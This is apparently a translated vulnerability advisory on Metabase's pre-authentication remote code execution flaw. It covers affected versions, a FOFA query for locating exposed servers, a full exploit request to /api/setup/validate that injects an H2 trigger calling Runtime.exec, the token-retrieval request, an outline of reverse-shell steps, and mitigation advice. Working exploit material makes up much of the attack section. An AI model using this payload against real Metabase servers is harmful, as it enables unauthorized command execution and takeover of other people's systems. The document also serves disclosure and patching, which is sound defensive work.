0x01 Product Introduction
Metabase is an open source data analysis and visualization tool that helps users easily connect to various data sources, including databases, cloud services, and APIs, and then use an intuitive interface for data query, analysis, and visualization.
0x02 Vulnerability Overview
An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary commands on the server with the privileges of running the Metabase server.
It is worth noting that the repaired version also needs to be installed before the vulnerability can be repaired, otherwise there is still the possibility of being exploited by attackers.
0x03 range of influence
Metabase open source 0.46 < 0.46.6.1
Metabase Enterprise 1.46 < 1.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase open source 0.43 < 0.43.7.2
Metabase Enterprise 1.43 < 1.43.7.2
0x04 Recurrence environment
FOFA:app="Metabase"
0x05 Vulnerability Reappearance
exp
POST /api/setup/validate HTTP/1.1
Host: your-ip
Content-Type: application/json
{
"token": "token值",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('执行的命令')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "test",
"engine": "h2"
}
}PS: This method is only for the in-depth use of the H2 database
Get a valid token
GET /api/session/properties HTTP/1.1
Host: your-ip
DNSlog verification
rebound shell
PS: In an environment that cannot be rebounded directly, you can try the following methods
Write a rebound shell script
Python builds an http server to let the target download the script
It can be seen that the download was successful
VPS starts monitoring and executes scripts
rebound successfully
0x06 Repair suggestion
interim mitigation plan
Restrict access sources through network ACL policies, such as only allowing access requests from specific IP addresses or address segments.
Upgrade Repair Solution
The official version has been released. All affected users are advised to visit the official website as soon as possible and update to the corresponding security version.
For users of the open source version, since the official source code of the repair has not been released, you can directly download the prepackaged jar file from the release page for use
For users using the Docker version, just pull the latest version of the image to update. Before starting the upgrade, however, make sure you have backed up your data.
In addition, no matter what repair version is used, it is necessary to ensure that the application can be logged in and used normally after the installation process is completed to fix the vulnerability. At the same time, as a security suggestion, some unused services should be offline in time.